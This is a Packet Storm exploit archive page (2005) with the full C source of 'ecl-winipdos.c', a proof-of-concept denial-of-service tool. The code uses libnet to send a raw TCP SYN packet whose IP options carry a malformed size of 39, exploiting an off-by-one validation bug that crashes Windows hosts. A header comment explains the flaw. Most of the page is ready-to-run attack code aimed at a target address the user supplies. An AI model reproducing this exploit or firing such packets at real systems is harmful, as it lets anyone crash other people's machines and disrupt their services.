exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ecl-winipdos.c

ecl-winipdos.c
Posted May 22, 2005
Authored by Yuri Gushin, Alex Behar

Proof of concept denial of service exploit for windows that takes advantage of an off-by-one validation error in the IP options field.

tags | exploit, denial of service, proof of concept
systems | windows
SHA-256 | d7df1b3010abe516474a21359a3e5d3ade7dd7d59fba1320e7cf0f04c5bd8a18

ecl-winipdos.c

Change Mirror Download
/* ecl-winipdos.c - 16/04/05
* Yuri Gushin <yuri@eclipse.org.il>
* Alex Behar <alex@eclipse.org.il>
*
* This one was actually interesting, an off-by-one by our beloved
* M$ :)
*
* When processing an IP packet with an option size (2nd byte after
* the option) of 39, it will crash - since the maximum available
* size is 40 for the whole IP options field, and two are already used:
* [ OPT ] [ SIZE ] [ 38 more bytes ]
* Checks are done to validate that the option-size field is less than
* 40, where a value less than !39! should be checked for validation.
*
* Note that this doesn't affect ALL options, and is also dependant upon
* the underlying protocol.
* Anyways, a small PoC to see how it works and why, tweak test and
* explore, have fun :)
*
*
* Greets fly out to the ECL crew, Valentin Slavov, blexim, stranger,
* manevski, elius, shrink, Evgeny Pinchuk, Ishay Sommer, and anyone else
* who got left out :D
*
*/


#ifndef _BSD_SOURCE
#define _BSD_SOURCE
#endif

#include <stdio.h>
#include <string.h>
#include <time.h>
#include <libnet.h>

#define IP_H 20
#define IPOPTS_MAX 40

void banner();
void usage(char *);

int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
char *device = NULL;

int c;
u_char *buf;
int packet_len = 0;

struct ip *IP;
struct tcphdr *TCP;
u_int32_t src = 0, dst = 0;


banner();
if (argc < 4) usage(argv[0]);

if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) {
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(-1);
}

if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved source address\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved destination address\n");
exit(-1);
}

if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {
perror("malloc");
exit(-1);
}

buf[20] = atoi(argv[3]);
buf[21] = 39; // our malformed size

for (c = 0; c<38; c+=3)
strncpy(&buf[22+c], "ECL", 3); // padding

TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX);
TCP->th_off = 5;

packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2);

srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_TCP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;

TCP->th_sport = htons(1337);
TCP->th_dport = htons(80);
TCP->th_seq = 0;
TCP->th_ack = 0;
TCP->th_x2 = 0;
TCP->th_flags = TH_SYN;
TCP->th_win = rand() & 0xffff;
TCP->th_sum = 0;
TCP->th_urp = 0;

libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2);

if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
exit(-1);
}

printf("Packet sent.\n");

libnet_destroy(l);
free(buf);
return (0);
}

void usage(char *cmd)
{
printf("Usage: %s <source> <destination> <option>\n",cmd);
exit(-1);
}

void banner()
{
printf("\t\tWindows malformed IP Options DoS exploit\n"
"\t\t Yuri Gushin <yuri@eclipse.org.il>\n"
"\t\t Alex Behar <alex@eclipse.org.il>\n"
"\t\t\t ECL Team\n\n\n");
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close